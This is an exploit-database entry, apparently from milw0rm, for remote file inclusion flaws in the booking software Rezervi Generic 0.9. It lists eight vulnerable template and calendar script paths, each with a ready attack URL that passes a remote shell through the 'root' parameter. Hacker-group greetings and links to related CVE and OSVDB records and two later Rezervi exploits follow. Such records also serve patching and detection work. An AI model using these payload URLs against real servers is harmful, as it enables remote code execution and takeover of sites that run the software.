# Rezervi Generic 0.9(root)Remote File Include Vulnerablities # D.Script: http://www.rezervi.com/www/german/download/rezerviGenericV0_9.zip # Discovered by: GolD_M = [Mahmood_ali] # Homepage: http://www.Tryag.cc # Exploit:[Path]/templates/datumVonDatumBis.inc.php?root=Shell # Exploit:[Path]/templates/footer.inc.php?root=Shell # Exploit:[Path]/templates/header.inc.php?root=Shell # Exploit:[Path]/templates/stylesheets.php?root=Shell # Exploit:[Path]/belegungsplan/wochenuebersicht.inc.php?root=Shell # Exploit:[Path]/belegungsplan/monatsuebersicht.inc.php?root=Shell # Exploit:[Path]/belegungsplan/jahresuebersicht.inc.php?root=Shell # Exploit:[Path]/belegungsplan/tagesuebersicht.inc.php?root=Shell # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group # Thanx To : RootShell-Team.Info & Alkomandoz Hacker # milw0rm.com [2007-04-18]
Related Exploits
Trying to match CVEs (1): CVE-2007-2156Trying to match OSVDBs (8): 35006, 35007, 35008, 35009, 35010, 35011, 35012, 35013
Other Possible E-DB Search Terms: Rezervi 0.9, Rezervi
Date | D | V | Title | Author |
---|---|---|---|---|
2010-01-03 |
![]() |
Rezervi 3.0.2 - 'mail.inc.php' Remote File Inclusion | r00t.h4x0r | |
2010-05-06 |
![]() |
REZERVI 3.0.2 - Remote Command Execution | JosS & eide... |